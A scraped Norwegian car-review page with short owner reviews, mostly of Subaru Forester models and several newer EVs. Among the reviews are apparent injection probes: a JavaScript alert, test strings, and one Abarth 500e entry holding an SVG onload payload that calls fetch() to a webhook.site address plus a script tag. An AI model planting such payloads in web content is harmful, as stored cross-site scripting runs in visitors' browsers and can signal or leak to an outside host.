Vurdert av Myra
Subaru Forester (2018)
Forester = Driftsikkerhet, framkommelighet og god komfort. Med 2018 modellen kom adaptiv fartsholder, filholder mm. Med skinnseter og panoramasoltak får bilen det lille ekstra av luksus den trenger
Subaru Forester (2018)
Totalt sett kjempefornøyd. Hver tur er en glede. Fremkommelighet på vinterføre helt på topp
Subaru Forester (2018)
Bil nr 3 av samme type. Fornøyd eier.
Subaru Forester (2017)
Min Forester nr 4 og er kjempefornøyd. En av karakterene er kjøreglede. Gir lavest på den. Ikke derfor jeg velger Forester, men driftssikker, komfortabel, og en gjennomført god bil - den beste fr
Subaru Forester (2017)
Min andre Forester. God på sommeføre. Super på vinterføre. Som skapt for vinterkjøring med tung henger ( har forsøkt )
Subaru Forester (2017)
En veldig bra bil totalt sett. Veldig fin å kjøre, blir nok Subaru neste gang også
Subaru Forester (2017)
Driftsikker med god oversikt.Super på gjørmete,isete,snødekte veier,får du problemer trykk på x mode,da tar elektronikken over og får deg frem.
Subaru Forester (2017)
Trygg.
Subaru Forester (2017)
Helt fenomenal bil, og en fantastisk trekkvogn.
Subaru Forester (2017)
Vi er svært fornøyd med vår Forester. Glimrende komfort, god kvalitet og enorm fremkommelighet. Etter drøyt 50 000 kjørte kilometer så langt i år har bilen definitivt stått til forventningene.
Subaru Forester (2016)
Hatt en Legacy en Impreza og to Forester. Kjøp og service først hos Formo også hos Autostrada i Grenland Telemark. Svært fornøyd med Formo. Starten hos Autostrada også meget bra. Men etter omorg
Subaru Forester (2016)
Knallbra 4hjulstrekk! flott vinterbil! Denne kommer frem de utroligste steder, med praktisk Høyt og lav gir. Starter alltid uansett vær, og bruker forsåvidt lite drivstoff til at det er en konstant
Subaru Forester (2016)
Total en god bil er veldig godt 4wd og over alle en god bil fornøyde
Subaru Forester (2016)
Suveren soliditet,fremkommelighet og velutstyrt i Premiumutgave. Utmerket vinterbil,god motor/automatgir. Forsetekomfort kan bedres.
Subaru Forester (2016)
Grei bil i medium-suv segmentet. CVT gearkasse er håpløs for de som er vant til dobbelclutch eller konvensjonell gearkasse. Bensinforbruk er skyhøyt over 'brosjyreforbruk'. Undermotorisert.
Volvo XC40 (2024)
Veldig fornøyd med bil, komfort og spesielt støy som er lavere enn de fleste biler i denne klasse/ pris. Ingen problemer med bilen!
Skoda Enyaq (2025)
Brukt som drosje, har per nå 75000km. Veldig stor oppgradering å få batterivarme. Regenerativ bremsing anbefales ikke på vinterføre. Får minus på forbruk da bilen gir meg 270-330km på kaldeste
Volvo EX30 (2025)
Mekanisk fin bil men med et makkverk av software som er full av feil. Se Volvo ex30 forum for tidenes lengste og gjentakende feil rapporter. Volvo ser ikke ut til å være interessert å ordne opp des
Skoda Enyaq (2023)
Syns utseende å bilen er tøff, ellers kan jeg ikke sa hva den skal være bedre på enn sine konkurrenter. Sitte stillingen passer meg dårlig, men fruen liker det. Pluss at den har soltak Elendi
Mazda CX-5 (2013)
Bilens største utfordring med skyactive motor er relatert til partikkelfilter, koksing av inntaksmanifold og tett sumpfilter, som kan lede til havari. Annet er utkobling av turbo på grunn av feil ve
Renault 5 E-Tech (2025)
Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.